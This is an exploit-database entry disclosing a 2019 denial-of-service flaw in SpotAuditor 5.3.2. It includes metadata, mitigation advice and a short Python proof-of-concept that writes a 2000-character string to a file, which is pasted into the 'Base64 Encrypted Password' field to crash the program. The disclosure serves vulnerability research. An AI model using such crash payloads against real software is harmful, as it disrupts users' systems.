header-logo
Suggest Exploit
vendor:
SpotAuditor
by:
ZwX
5.5
CVSS
MEDIUM
Denial of Service
CWE
Product Name: SpotAuditor
Affected Version From: 5.3.2002
Affected Version To: 5.3.2002
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 7
2019

SpotAuditor 5.3.2 – ‘Base64’ Denial Of Service (PoC)

This exploit allows an attacker to create a file with a long string of characters, causing SpotAuditor to crash when attempting to decrypt the characters. The exploit is performed by running a Python script that creates a file with a long string of characters, which is then copied and pasted into the 'Base64 Encrypted Password' field in SpotAuditor. This causes the software to crash.

Mitigation:

The vendor should release a patch or update to fix the vulnerability. In the meantime, users can avoid the exploit by not copying and pasting long strings of characters into the 'Base64 Encrypted Password' field.
Source

Exploit-DB raw data:

#Exploit Title: SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC)
#Exploit Author : ZwX
#Exploit Date: 2019-11-26
#Vendor Homepage : http://www.nsauditor.com/
#Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
#Tested on OS: Windows 7


'''
Proof of Concept (PoC):
=======================

1.Download and install SpotAuditor
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Tools -> Base64 Encrypted Password
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Base64 Encrypted Password' and click on 'Decrypt'
6.SpotAuditor Crashed
'''
#!/usr/bin/python

http = "http//"
buffer = "\x41" * 2000


poc = http + buffer 
file = open("poc.txt","w")
file.write(poc)
file.close()
 
print "POC Created by ZwX"